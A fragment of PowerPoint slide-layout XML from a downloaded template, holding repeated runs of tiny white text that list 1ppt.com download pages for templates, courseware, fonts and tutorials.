              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout39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39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39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39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40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40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40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40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40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40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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout40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40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40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40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41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41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41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41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41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41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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout41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41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41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41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42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42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42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42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42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42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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
